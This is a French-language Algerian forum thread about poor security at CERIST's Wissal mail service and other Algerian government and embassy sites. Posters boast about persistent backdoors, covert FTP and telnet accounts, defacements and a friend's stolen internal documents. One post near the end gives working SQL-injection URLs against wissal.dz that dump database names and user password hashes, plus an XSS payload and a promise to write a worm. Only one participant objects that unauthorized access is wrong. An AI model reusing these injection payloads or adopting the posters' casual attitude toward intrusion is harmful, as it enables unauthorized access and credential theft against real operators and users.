Jump to content
SecDz

Messageire Wissal du Cerist

Recommended Posts

Je me suis souvenu d'un constat que j'ai fait en vérifiant la validité des couplets user/password de la messagerie Wissal du Cerist qu'un "super hacker" a posté sur ce forumdz.

Ce service de messagerie permet de vérifier si un compte existe ou non par simple interrogation independament de la validité au non du mot de passe

 

Plus de détails : http://secdz.blogspot.com/2008/08/wissal-du-ceristentre-securit-et.html

Share this post


Link to post
Share on other sites

***************** Ah j'étais si jeune !!! Salah n'est plus là maintenant

Edited by badrh0

Share this post


Link to post
Share on other sites
Guest HAVOC

Les gens du CERIST ne sont pas sérieux, ça fait 2 ans que j'ai un backdoor qui traine sur un de leur serveur et la faille exploitée est toujours présente malgré l'avoir signalé par emails aux responsables. D'ailleurs, je les remercie de leur impolitesse en me laissant sans réponse.

Share this post


Link to post
Share on other sites
Les gens du CERIST ne sont pas sérieux, ça fait 2 ans que j'ai un backdoor qui traine sur un de leur serveur et la faille exploitée est toujours présente malgré l'avoir signalé par emails aux responsables. D'ailleurs, je les remercie de leur impolitesse en me laissant sans réponse.

 

Salut HAVOC

Comment se fait-il que nos deux shells ne se soient jamais croisés :confused:

:D

Le débat serait beaucoup trop long si on se mettaient à chercher le pourquoi du comment dans ces histoires de sécurité, le fait est que ces sites sont là tout prêts à être pénétrés :p par quiconque le souhaite

Maintenant y'a ceux comme moi qui aiment le "Hacked by" :D et ceux comme SecDZ qui portent un nom qui n'a aucun sens puisque self-contradictoire :D [amicalement SecDZ ;)] et qui préfèrent (enfin je crois) alerter les admins un peu trop oisifs :o

Et du moment qu'on y est je prépare une ptite surprise pour un site trés connu ;-)

Share this post


Link to post
Share on other sites
Salut;

ça na rien d'extraordinaire x)

http://wixxl.dz/xxxxer/userlist

Trouvé en 2 min chrono :o

Voilà :)

Salut hakim ;)

Bah j'ai jamais dis que c'était un truc de ouf :D

Par contre je ne trouve aucune raison valable pour qu'ils aient posé ça là :confused: , et un minimumu de sec aurait été de restreidre le directory listing :confused: Alors soit le mec qui a un jour fait ça était completement défoncé :D soit ils le font éxprés :cool:

Share this post


Link to post
Share on other sites

un pote a moi a eu accès au FTP du cerist pendant des années.

 

j'ai les totos , les docs internes , les CV etc...

 

 

A+++

Share this post


Link to post
Share on other sites
Guest HAVOC
Salut HAVOC

Comment se fait-il que nos deux shells ne se soient jamais croisés :confused:

:D

Le débat serait beaucoup trop long si on se mettaient à chercher le pourquoi du comment dans ces histoires de sécurité, le fait est que ces sites sont là tout prêts à être pénétrés :p par quiconque le souhaite

Maintenant y'a ceux comme moi qui aiment le "Hacked by" :D et ceux comme SecDZ qui portent un nom qui n'a aucun sens puisque self-contradictoire :D [amicalement SecDZ ;)] et qui préfèrent (enfin je crois) alerter les admins un peu trop oisifs :o

Et du moment qu'on y est je prépare une ptite surprise pour un site trés connu ;-)

 

Tout d'abord parceque je laisse des backdoor discrets, pas toujours des backdoor PHP... se créer un user en ftp ou telnet c'est tout aussi efficace et plus discret.

Je reste caché vis-à-vis des antivirus et il y a tellement de sites hébergés que cela serait fastidieux d'y rechercher un backdoor manuellement.

Ils utilisent une architecture à base de Windows NT et d'IIS6 pensant que cela suffit à protéger leur serveur hors même un accès en lecture simple permet de faire pas mal de choses.

CERIST n'est pas le seul a avoir des serveurs pourri, je connais le site d'une ambassade qui est sans aucun doute le plus pourrie en matière de sécurité, tout cela à cause d'un déploiement du CMS très très très mal faite (pourtant un CMS professionnel sans failles connues), en faite, il suffit d'accéder a la page d'admin du site pour découvrir que le login et mot de passe est déjà enregistré, il n'y a plus qu'à se loguer :)

Bref... il y a plein d'anomalie de ce genre qui rendent le pirate très très très simple.

Share this post


Link to post
Share on other sites

Tout d'abord parceque je laisse des backdoor discrets, pas toujours des backdoor PHP... se créer un user en ftp ou telnet c'est tout aussi efficace et plus discret.

Biennnn ;) malheuresement sais pas faire ça moi pour le moment :p lol

 

CERIST n'est pas le seul a avoir des serveurs pourri, je connais le site d'une ambassade qui est sans aucun doute le plus pourrie en matière de sécurité, tout cela à cause d'un déploiement du CMS très très très mal faite (pourtant un CMS professionnel sans failles connues),

Le plus grand problème des sites algeriens c'est que leurs admins pensent que le server est une poubelle :D il laissent trainer des années et des années des pages qui peuvent être une vraie bombe a retardement parfois (si on sait les manipuler convenablement :cool: )

 

en faite, il suffit d'accéder a la page d'admin du site pour découvrir que le login et mot de passe est déjà enregistré, il n'y a plus qu'à se loguer

Alors là c'est sûr ! l'admin était défoncé lorsqu'il a fait ça :D

Share this post


Link to post
Share on other sites

Moi j'ai toujours cette question sans réponse :

Quel "vrai" de pirater un site, à part avoir l'impression de relever un défi....la première fois ça peut se comprendre , mais après....l'oisiveté peut-pêtre ??? non je ne trouve pas.

Share this post


Link to post
Share on other sites
Moi j'ai toujours cette question sans réponse :

Quel "vrai" de pirater un site, à part avoir l'impression de relever un défi....la première fois ça peut se comprendre , mais après....l'oisiveté peut-pêtre ??? non je ne trouve pas.

Là je crois que rak t3ayarni poliment ;) mais pas grave :)

C'est sûr que si je n'avais pas du temps a en revendre je ferais moins le mariole :D mais tant que je suis au chomage :( je continuerais a hacker lol :D

Et moi je me pose une question :

" a quoi ça sert de se creuser la tête pour trouver une faille de sec pour aprés avertir un admin un peu trop maladroit en faisant ainsi le travail de ce dernier alors que lui est payé pour faire ça et moi pas ????! :confused: non désolé je préfère encore savourer le hacked by :D sauf bien sûr si c'est un site que je respecte beaucoup :cool: ?"

Réponse : Non je cherche mais ne trouve pas !!!

Edited by badrh0

Share this post


Link to post
Share on other sites
Là je crois que rak t3ayarni poliment ;) mais pas grave :)

 

Désolé, c'était un coup de gueule :-)

 

mais tant que je suis au chomage :( je continuerais a hacker lol :D

 

Et tu n'as jamais pensé à exploiter ce que tu sais pour te valoriser...travailler dans ce domaine par exemple ?

 

 

Et moi je me pose une question :

" a quoi ça sert de se creuser la tête pour trouver une faille de sec pour aprés avertir l'admin un peu maladroit en faisant ainsi le travail de ce dernier alors que lui est payé pour faire ça et moi pas ????!

 

La réponse dépend de tes convictions et de tes principes dans la vie...je sais c'est philosophique :-)

 

sauf bien sûr si c'est un site que je respecte beaucoup

 

Ou que tu ne peux pas pirater :-)

Share this post


Link to post
Share on other sites
Désolé, c'était un coup de gueule :-)

hummmmm, t'as été la cible d'un pirate on dirait :D

 

Et tu n'as jamais pensé à exploiter ce que tu sais pour te valoriser...travailler dans ce domaine par exemple ?

Mon domaine c'est pas l'informatique, c'est tout autre chose, et je m'y investit serieusement, mais quand j'en ai marre, je vais prendre l'air, et cet air c'est le h@cking ;-) , peut-être que ça me passera, surement, mais je vois le bon coté des choses, en même pas 3 mois j'ai reussis a apprendre ce que mes camarades n'ont pas appris en 5 ans d'ingeniorat a l'univ ;) et maintenant ils viennent même demander mon aide :cool:, je ne trouve pas ça normal, surtout que pour moi c'est une activité collatérale, et je suis loin d'être un cr@ck :p

 

La réponse dépend de tes convictions et de tes principes dans la vie...je sais c'est philosophique :-)

C'est vrai, mais je ne cause jamais de mal aux sites que je visite :cool: (sauf ceux que je déteste :D ), juste je dis : "j'étais là" :D

 

Ou que tu ne peux pas pirater :-)

lol c'est vrai que y'en a une tonne contre qui j'ai une dent amis malheureusement je ne peux rien faire, mais patience je n'en suis qu'a mes débuts :cool:

 

Trés cool la convers avec toi SecDz ;) j'éspère que tu n'as pas d'animosité a mon encontre :rolleyes:

Share this post


Link to post
Share on other sites
hummmmm, t'as été la cible d'un pirate on dirait :D

 

A ma connaissance non :-)...mais c'est là tout le problème : "savoir"

 

en même pas 3 mois j'ai reussis a apprendre ce que mes camarades n'ont pas appris en 5 ans d'ingeniorat a l'univ ;)

 

C'est toi qui est un génie, mais ceux les nuls :-)

 

je suis loin d'être un cr@ck :p

 

Je te crois sur parole :-)

 

 

C'est vrai, mais je ne cause jamais de mal aux sites que je visite :cool: (sauf ceux que je déteste :D ), juste je dis : "j'étais là" :D

 

L'accès non autorisé, avec ou sans dégats, est répréhensible.

Que dira-tu de quelqu'un qui s'introduit dans ta maison (même si tu as laissé la porte ouverte) et qui a comme excuse : "j'ai rien cassé et j'ai rien pris" ???!!!!

 

j'éspère que tu n'as pas d'animosité a mon encontre :rolleyes:

 

J'ai seulement du regret !

Pense une seule fois au cas où tu tombe sur quelqu'un qui pourra te tracer et t'identifier....alors tu n'aura plus le temps ni pour ton activité principale ni celle "collatérale".....c'est vrai que les lois chez nous dans ce domaine sont presque inéxistante...mais c'est aussi ça qui aggravera la situation de ceux qui seront pris

Share this post


Link to post
Share on other sites
A ma connaissance non :-)...mais c'est là tout le problème : "savoir"

Tu t'appelles SecDz non ! Au fait il faut que tu penses comme un h@cker :D

 

C'est toi qui est un génie, mais ceux les nuls :-)

:rolleyes: Ah non là tu me gattes :p

 

Je te crois sur parole :-)

:mad: Je passe :D

 

L'accès non autorisé, avec ou sans dégats, est répréhensible.

Que dira-tu de quelqu'un qui s'introduit dans ta maison (même si tu as laissé la porte ouverte) et qui a comme excuse : "j'ai rien cassé et j'ai rien pris" ???!!!!

J'accepte ses éxcuses :D parceque c'est moi le co'n qui a laissé ma porte ouverte lol :D

 

J'ai seulement du regret !

Relaxe ! Je tue pas des vies ni me shoutte a la cok :p

 

Pense une seule fois au cas où tu tombe sur quelqu'un qui pourra te tracer et t'identifier....alors tu n'aura plus le temps ni pour ton activité principale ni celle "collatérale".....c'est vrai que les lois chez nous dans ce domaine sont presque inéxistante...mais c'est aussi ça qui aggravera la situation de ceux qui seront pris

Que veux-tu ? j'aime jouer a la roulette russe :p

Non plus serieusement, il est tout a fait possible que quelqu'un arrive a me pister, mais dans ce cas ça ne sera pas un admin algerien lol :) ,aprés avoir piraté le site du rnd y'a quelqu'un qui m'a contacté comme quoi un ami amgerien a un ami a lui lui a demander de s'occuper d'un probleme de sécurité :eek: , faut-il passer par l'ami étranger d'un ami pour faire ça ???!!! Le problème ne se poserait surement pas si on recrutait par compétences et non pas selon "les épaules" dans ce bled ! Mais si c'est comme ça alors le h@ck :D est un semblant de revenche pour moi ....

Toujours est-il qu'il a promit de me trouver mais je ne vois rien venir :confused::D

 

Et tu n'as jamais pensé à exploiter ce que tu sais pour te valoriser...travailler dans ce domaine par exemple ?

Donnes moi des idées toi si ça t'a réussi :) , si tu parviens a me convaincre alors là j'arrêterais le h@ck ;) promis, et tu pourras ajouter une ba pour ta philo :D

 

PS: Si ce n'est pas contre tes convictions ptêt que tu pourras porter ta contribution :cool:

Edited by badrh0

Share this post


Link to post
Share on other sites
Guest HAVOC

Cela me fait sourir de voir parler de ******* quand on se contente d'exploiter des backdoor PHP (sans vraiment connaitre leur fonctionnement) ou des failles bien connues tirées de site comme milw0rm.

 

Le ******* c'est plus profond que ça, un vrai piratage se fait sur un système informatique sécurisé et unique. Attaquer un site parce qu'il utilise un CMS mal fait ou dont l'admin ne se préoccupe pas de la sécurité cela n'est pas valorisant.

 

Je n'oserais jamais dire que je suis un hacker ou que je hack des serveurs en m'attaquant à ceux du CERIST par exemple, cela est tellement simple que cela demande qu'un minimum de connaissance théorique et pratique, je vois mal une personne hacker rééllement un serveur ou un réseau sans avoir de connaissance (compilation, réseaux, programmation, cryptographie...).

D'ailleurs, on ne voit jamais un "hacker" algérien hacker un réseau ou un système de cryptage. Cela reste que des attaques "de surface" qui visent la couche web du serveur. Au mieux, on n'attaque un serveur à l'aide d'une faille connue dont l'exploit est largement disponible sur le net.

 

C'est un peu comme le phénomène du ******* des réseaux wifi au temps ou le cryptage WEP était répendue. Tout les bidouilleurs s'amuser à hacker le réseau des voisins hors vu les outils disponibles et les tutos cela se résumait à entrer bêtement une liste de commande et à être patient. Combien de ces gens là ont pris la peine d'étuder le cryptage WEP ? commbient savent ce qu'est un vecteur d'initialisation ? Combien savent ce qu'est la différence entre cryptage WEP et WPA? Savent-il ce qu'est un algorithme CRC, RC4...Etc ? Comment s'effectue l'authtification d'un PC en réseau wifi protégé par le protocole WEP?

Pourtant ces choses "élémentaires" sont obligatoirement à connaitre pour mettre au point des techniques d'attaques du réseau.

 

Bref, souvent les gens pensent qu'utiliser un outil équivaut à le maitriser. Le ******* c'est loin d'etre représentatif par les exploits trouvés sur le net.

Edited by HAVOC

Share this post


Link to post
Share on other sites
Cela me fait sourir de voir parler de ******* quand on se contente d'exploiter des backdoor PHP (sans vraiment connaitre leur fonctionnement) ou des failles bien connues tirées de site comme milw0rm.

 

Le ******* c'est plus profond que ça, un vrai piratage se fait sur un système informatique sécurisé et unique. Attaquer un site parce qu'il utilise un CMS mal fait ou dont l'admin ne se préoccupe pas de la sécurité cela n'est pas valorisant.

 

Je n'oserais jamais dire que je suis un hacker ou que je hack des serveurs en m'attaquant à ceux du CERIST par exemple, cela est tellement simple que cela demande qu'un minimum de connaissance théorique et pratique, je vois mal une personne hacker rééllement un serveur ou un réseau sans avoir de connaissance (compilation, réseaux, programmation, cryptographie...).

D'ailleurs, on ne voit jamais un "hacker" algérien hacker un réseau ou un système de cryptage. Cela reste que des attaques "de surface" qui visent la couche web du serveur. Au mieux, on n'attaque un serveur à l'aide d'une faille connue dont l'exploit est largement disponible sur le net.

 

C'est un peu comme le phénomène du ******* des réseaux wifi au temps ou le cryptage WEP était répendue. Tout les bidouilleurs s'amuser à hacker le réseau des voisins hors vu les outils disponibles et les tutos cela se résumait à entrer bêtement une liste de commande et à être patient. Combien de ces gens là ont pris la peine d'étuder le cryptage WEP ? commbient savent ce qu'est un vecteur d'initialisation ? Combien savent ce qu'est la différence entre cryptage WEP et WPA? Savent-il ce qu'est un algorithme CRC, RC4...Etc ? Comment s'effectue l'authtification d'un PC en réseau wifi protégé par le protocole WEP?

Pourtant ces choses "élémentaires" sont obligatoirement à connaitre pour mettre au point des techniques d'attaques du réseau.

 

Bref, souvent les gens pensent qu'utiliser un outil équivaut à le maitriser. Le ******* c'est loin d'etre représentatif par les exploits trouvés sur le net.

 

Havoc j'éspère que tu ne parles pas de moi dans ce poste :D parceque je n'oserais jamais aller piocher dans milw0rm, utiliser le dork, et h@cker des sites comme ça a l'aveuglette !!!!!!! Bien sûr je ne maîtrise pas les trucs que tu viens de citer (mais je compte y remedier;) ) mais quand je trouve une faille c'est en appliquant toutes mes connaissances (aussi étroites soient-elles), et puis c'est quoi un backdoor??? je crois que les options les plus courantes qui s'y trouvent ne sont pas trop dure a comprendre (je veux dire coté code) enfin ! je parle pour moi ! toutes les options que j'utilise je sais comment elles fonctionnent, et justement je suis entrain de concocter un shell perso qui comporte éxclusivement ce dont j'ai besoin :cool: ! Quant au ******* haut niveau dont tu parles, je crois qu'il faut beaucoup de temps pour oser dire qu'on le maîtrise bien.

Oui je hack les couches web, mais ça ne fait pas de moi pour autant un script-kiddy :p et si tu maîtrise ce dont tu parles, je trouve que c'est bien ;) mais il ne faut pas juger les gens juste comme ça !!!

Bonne nuit a tous et pour ceux qui h@ckent : bon ******* :D

Share this post


Link to post
Share on other sites

Salut tout le monde ^^

 

Et bah a mon avis ce n'est pas la peine de recréer des shells pour les utiliser surtout si ça existe déjà !! pourquoi perdre du temps a faire ce que les autres ont déjà fait ? si c'est pour dire enfin de compte "Tiens j'ai pu le faire aussi" tandis que les autres ont crées autre chose .. bref à mon avis les hackers, crackers ainsi les script-kiddies sont la bienvenu dans le monde de l'informatique parce que ça aide les développeurs et les webmasters a mieux connaitre leurs fautes et ça les aide a progresser (pas le cas de tout le monde bien sur).

 

Petite question à HAVOC : pourquoi utilises-tu un navigateur si tu n'arrives pas a en faire un ? est-ce que cela fait de toi un aussi script-kiddies en voulant naviguer sur le net ?

 

C'est un simple exemple je trouve, et puis pour badrh0 fait ce qui te semble correct, j'aimerai bien qu'ils écrivent ton pseudo à Aljazeera un jour pourquoi pas lol ^^ et puis tu ne peux pas juger celui qui respect ses principes en disant que tel faille se trouve dans tel service ^^ on est libre de faire ce qu'on veut vu que la loi n'existe pas dans notre pays !

 

On sait tous que les administrateurs des sites officieux algériens ne sont pas capables de faire leurs boulots

 

a mon avis vaut mieux qu'ils laissent leurs places a ceux qui les méritent .. je le dis clairement .. Je ne veux pas qu'un jour les étrangers se moquent de nos compétences dans le domaine de la sécurité informatique..

 

Et le plus grand problème est le fait de vouloir créer un site .dz (Ils demandent même l'acte de naissance de nos grand grand grand pères, pour un site NON SECURISE) ... qu'ils le gardent pour eux ..

 

Cordialement

Share this post


Link to post
Share on other sites
Guest HAVOC

Petite question à HAVOC : pourquoi utilises-tu un navigateur si tu n'arrives pas a en faire un ? est-ce que cela fait de toi un aussi script-kiddies en voulant naviguer sur le net ?

 

Ne le prend pas mal mais cet exemple est complètement à coté de la plaque ! Tu utilises un browser autant qu'internaute et non programmeur.

De plus, je parle de comprendre le fonctionnement et non de concevoir, un informaticien sait comment fonctionne un browser même s'il ne va pas coder son propre navigateur.

 

C'est pareil pour les backdoor, il faut savoir comment il fonctionne, qu'elles fonctions il exploite...etc. Donc il faut connaitre le langage dans lequel il est codé, ces connaissances par exemple permettront de surmonter certaines systèmes de protection au lieu de se demander bêtement pourquoi son shell ne permet pas d'injecter des commandes...etc.

 

Je remarque que trop souvent ceux qui se mettent au hacker (y'a un effet de mode ces dernières années) se lance directement dans la lecture de tuto de hack... cette façon de faire suffit pour comprendre le niveau initiatique du ******* mais pour le reste il faut d'abord apprendre des choses plus terre à terre comme la programmation, les réseaux...etc.

 

Aussi, pour aller loin l'apprentissage de l'anglais devient une obligation. Personnellement, j'suis étudiant en informatique... je ne me forme pas particulièrement au *******, je préfère rester dans la branche maitre de ma filière puis me spécialiser au fur et à mesure dans les réseaux et la sécu... par expérience, je sais que cela diffère beaucoup de ce qu'on peut apprendre sur le ******* en fouillant sur le net et cela devient plus chiant à un certain niveau (car plus théorique) mais quand on aime on prend le meilleur et le pire d'une passion.

Share this post


Link to post
Share on other sites

Bon, les failles de sécurité dans les sites algériens sont devenus des choses banales ...

et là, on voit les amateurs profitent de plus en plus, sans aucune préalable connaissance du domaine ...

 

Mais, je me demande s'il y a une gendarmerie spéciale contre la crime technologique ( piratage ) en Algérie ou pas ???

Share this post


Link to post
Share on other sites
Guest hakim92
Mais, je me demande s'il y a une gendarmerie spéciale contre la crime technologique ( piratage ) en Algérie ou pas ???

Tu n'as rien fumé? :o

Share this post


Link to post
Share on other sites

Hi? :)

 

Désolés vous parlez comme les script kiddies, en fait, je l'observation que vous ete un Hacker "badrh0" Un vrai hacker par vos réponses et vos commentaires à une côté, et dans une autre côté , je vous vois comme un Defacer/Pirate-à-dire l'ensemble "Lamer"z/Noob"z" à mon avis, toujours et tout le moment, les pauvres defacers ils pensent qu'ils sont des vrais Hackers, ils viens de changer l'index par la trébuche de la publicité, ils utilisent les programmes écrits par d'autres, avec très peu de connaissances sur la façon dont ils travaillent, et puis . . . c'est du H4CKING? :), et aussi, pensez-vous que le Hacker est comme une personne qui entre dans les ordinateurs, pour tout briser le système. Le hacker est souvent mélangé avec le cracker/pirate qui est aussi appelé « hacker au mauvais sens du terme ».

 

En fait, je vais écrit sur un sujet c'est quoi Un véritable hacker et les types . . . , et d'autres types dans le domaine de la sécurité .

 

/UntilX

Edited by UntilX

Share this post


Link to post
Share on other sites

En fait ,

En tant que je suis Un Grey HAT :) j'ai fait un petit test d'un 5mn

 

Un bug SQL injection simple;

pour avoire tout les database installè sur leur server Mysql

 

http://www.wissal.dz/index.php?file=allevnmtcult&id=5990+AND+1+=+0+UNION+SELECT+null,schema_name,null,null,null,null,null,null,null,null+from+information_schema.SCHEMATA

 

Les passwords et les Users:

http://www.wissal.dz/index.php?file=allevnmtcult&id=5990+AND+1+=+0+UNION+SELECT+null,concat(username,0x3e,user_password),null,null,null,null,null,null,null,null+from+Wforum.Wf_users

 

Une faille XSS, je vais codè une Worm JS pour cette XSS et je la poste;

http://www.wissal.dz/index.php?file=archivenews&nat=alert("XSS")

 

Passwd Hash Disclosure (DES Unix (htaccess)):

http://www.wissal.dz/passwd
http://www.wissal.dz/admin

 

/UntilX :D

Share this post


Link to post
Share on other sites

C'est un simple exemple je trouve, et puis pour badrh0 fait ce qui te semble correct, j'aimerai bien qu'ils écrivent ton pseudo à Aljazeera un jour pourquoi pas lol ^^

Allah yahafdak ;) enfin quelqu'un qui ne critique pas ;)

 

a mon avis vaut mieux qu'ils laissent leurs places a ceux qui les méritent .. je le dis clairement ..

Tout a fait d'accord avec toi :cool: malheureusement dans notre bled c'est soit les "épaules" qui font la loi, soit les sentiments du genre "3andah wlidattes meskine" ! Bah qu'il se recycle ou alors il prend sa retraite et laisse un jeune demarrer sa vie :cool:

 

Je ne veux pas qu'un jour les étrangers se moquent de nos compétences dans le domaine de la sécurité informatique..

Ils le font déja ! mais ça ne m'étonnerait pas que dans 10 ans on importe des chinois ou des indiens pour nous construire des sites (informatiques) :D

 

... Ils demandent même l'acte de naissance de nos grand grand grand pères, ....

Sûrement pour vérifier que ton arrière-arrière-grand père n'ait pas des factures imayées quant a l'hébergement de son site .dz :D

 

Ne le prend pas mal mais cet exemple est complètement à coté de la plaque ! Tu utilises un browser autant qu'internaute et non programmeur.

Ne le prend pas mal mais c'est toi qui est a coté de la plaque ! Son exemple est tout a fait concordant si translaté vers l'univers des h@ckers, je m'éxplique, un h@cker a sûrement d'autres chats a fouetter que de concevoir un shell perso, je ne dis pas que ce n'est pas préférable, mais si tu as un outil sous la main, alors vaut mieux s'en servir ! Maintenant libre a toi d'utiliser une fonction dont tu ne comprends pas le fonctionnement si tu veux arriver a tes fins ! Mais je ne crois vraiment pas que quelqu'un qui n'y connais strictement rien pourrait arriver loin en utilisant des outils trouvés sur le net !

 

De plus, je parle de comprendre le fonctionnement et non de concevoir, un informaticien sait comment fonctionne un browser même s'il ne va pas coder son propre navigateur.

Un h@ker (pas un script kiddy) comprend les fonctionnement d'environs ... disons 50% du c99 par exemple, mais il ne saurait (sans grandes difficultés) coder ces 50% ! Un informaticien (bon) sais comment fonctionne le browser (disons IE7) a disons 50% mais il ne saurait comprendre un buffer overflow (sans grandes difficultés) dans ledit browser !

 

cette façon de faire suffit pour comprendre le niveau initiatique du ******* mais pour le reste il faut d'abord apprendre des choses plus terre à terre comme la programmation, les réseaux...etc.

Je suis d'accord avec toi, mais ça m'étonnerait que quelqu'un qui ne sait même pas coder du php ou du c aille chercher a pirater un site, il peut bien sûr être tenté :D mais il ne fera rien :D

Et tu as en face l'étudiant qui (aussi bon soit-il) se débat avec ses études d'informatique, alors je ne crois pas qu'en apprenant les requetes SQL il ait l'idée de faire une injection SQL, sinon ça serait un vrai visionnaire :D

 

Aussi, pour aller loin l'apprentissage de l'anglais devient une obligation

C'est le cas de toute discipline scientifique si on veut faire des études de haut niveau, mais je ne vois pas ce que ça a avoir avec le sujet :D

 

par expérience, je sais que cela diffère beaucoup de ce qu'on peut apprendre sur le ******* en fouillant sur le net

Et c'est justement ça le problème, a l'armée, on ne fait pas que t'enseigner a manier le fusil mais aussi a réfléchir comme l'ennemi (enfin j'éspère :D)

 

et cela devient plus chiant à un certain niveau (car plus théorique) mais quand on aime on prend le meilleur et le pire d'une passion.

C'est ça l'envers de la médaille, mais come tu dis il faut tenir le coup, mais apparement beaucoup de gens du CERIST ne le voient pas de cet oeil :D

 

Tu n'as rien fumé?

Je confirme, il a pris quelque chose :D

 

t'en es sur de toi ?!!! ...

Et voilà maintenant qu'il délire en croyant qu'il y'a une police gouvernementale secrète :D

Je crois que dans un autre domaine cela serait tout a fait plausible, mais pas ici, tu n'as qu'a aller jeter un coup d'oeil dans les site gov.dz on croirait des antiquités :D alors si vraiment y'avait des gens compétants dans les hautes sphères (toutes les sphères :D ) ils feraient un peu mieux que ça [regarder le

<img alt=":D" data-src="https://www.forumdz.com/uploads/emoticons/biggrin.png.d2880f69da1767a659caf5228ca269e4.png" src="https://www.forumdz.com/applications/core/interface/js/spacer.png">] <img alt=":D" data-src="https://www.forumdz.com/uploads/emoticons/biggrin.png.d2880f69da1767a659caf5228ca269e4.png" src="https://www.forumdz.com/applications/core/interface/js/spacer.png"><p> En plus si ça éxistait tu n'aurais pas ton DVD windows vista pour 70DA <img alt=":D" data-src="https://www.forumdz.com/uploads/emoticons/biggrin.png.d2880f69da1767a659caf5228ca269e4.png" src="https://www.forumdz.com/applications/core/interface/js/spacer.png"> et tu ne poserais sûrement pas ce genre de question maintenant <img alt=":D" data-src="https://www.forumdz.com/uploads/emoticons/biggrin.png.d2880f69da1767a659caf5228ca269e4.png" src="https://www.forumdz.com/applications/core/interface/js/spacer.png"></p> <p> </p> <p> </p> <blockquote data-ipsquote="" class="ipsQuote" data-ipsquote-username="UntilX" data-cite="UntilX" data-ipsquote-contentapp="forums" data-ipsquote-contenttype="forums" data-ipsquote-contentid="3798" data-ipsquote-contentclass="forums_Topic"><div> <p> Désolés vous parlez comme les script kiddies ...</p> <p> </p> </div></blockquote> <p> Saha le h@-coeur <img alt=":D" data-src="https://www.forumdz.com/uploads/emoticons/biggrin.png.d2880f69da1767a659caf5228ca269e4.png" src="https://www.forumdz.com/applications/core/interface/js/spacer.png"></p> <p> </p> <p> </p> <blockquote data-ipsquote="" class="ipsQuote" data-ipsquote-username="UntilX" data-cite="UntilX" data-ipsquote-contentapp="forums" data-ipsquote-contenttype="forums" data-ipsquote-contentid="3798" data-ipsquote-contentclass="forums_Topic"><div> <p> ... en fait, je l'observation que vous ete un Hacker "badrh0" Un vrai hacker par vos réponses et vos commentaires à une côté, et dans une autre côté , je vous vois comme un Defacer/Pirate-à-dire l'ensemble "Lamer"z/Noob"z" à mon avis, toujours et tout le moment, les pauvres defacers ils pensent qu'ils sont des vrais Hackers, ils viens de changer l'index par la trébuche de la publicité, ils utilisent les programmes écrits par d'autres, avec très peu de connaissances sur la façon dont ils travaillent, et puis . . . c'est du H4CKING? ...</p> <p> </p> </div></blockquote> <p> <img alt=":p" data-src="https://www.forumdz.com/uploads/emoticons/tongue.png.31eafaa0fe8d0b57cf49f7de71844c0b.png" src="https://www.forumdz.com/applications/core/interface/js/spacer.png"> OK Unix je ne sais pas dans quelle langue tu parles, mais je crois deviner que ran t3ayarni <img alt=":D" data-src="https://www.forumdz.com/uploads/emoticons/biggrin.png.d2880f69da1767a659caf5228ca269e4.png" src="https://www.forumdz.com/applications/core/interface/js/spacer.png"> peu importe ce que je fais ou pourquoi je le fait ou même quel niveau j'ai, je vois beaucoup de dénigrement dans ce domaine, alors je me ralirais au fil de pensée de SecDz qui dit " soit on accepte soit on se tait " <img alt=":cool:" data-src="https://www.forumdz.com/uploads/emoticons/cool.png.3a4b7036b568bb963f159dc02d8209f3.png" src="https://www.forumdz.com/applications/core/interface/js/spacer.png"></p> <p> </p> <p> </p> <blockquote data-ipsquote="" class="ipsQuote" data-ipsquote-username="UntilX" data-cite="UntilX" data-ipsquote-contentapp="forums" data-ipsquote-contenttype="forums" data-ipsquote-contentid="3798" data-ipsquote-contentclass="forums_Topic"><div> <p> En fait, je vais écrit sur un sujet c'est quoi Un véritable hacker et les types . . . , et d'autres types dans le domaine de la sécurité .</p> <p> </p> </div></blockquote> <p> Alors je te conseille de changer de langue <img alt=":p" data-src="https://www.forumdz.com/uploads/emoticons/tongue.png.31eafaa0fe8d0b57cf49f7de71844c0b.png" src="https://www.forumdz.com/applications/core/interface/js/spacer.png"></p>

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.




×
×
  • Create New...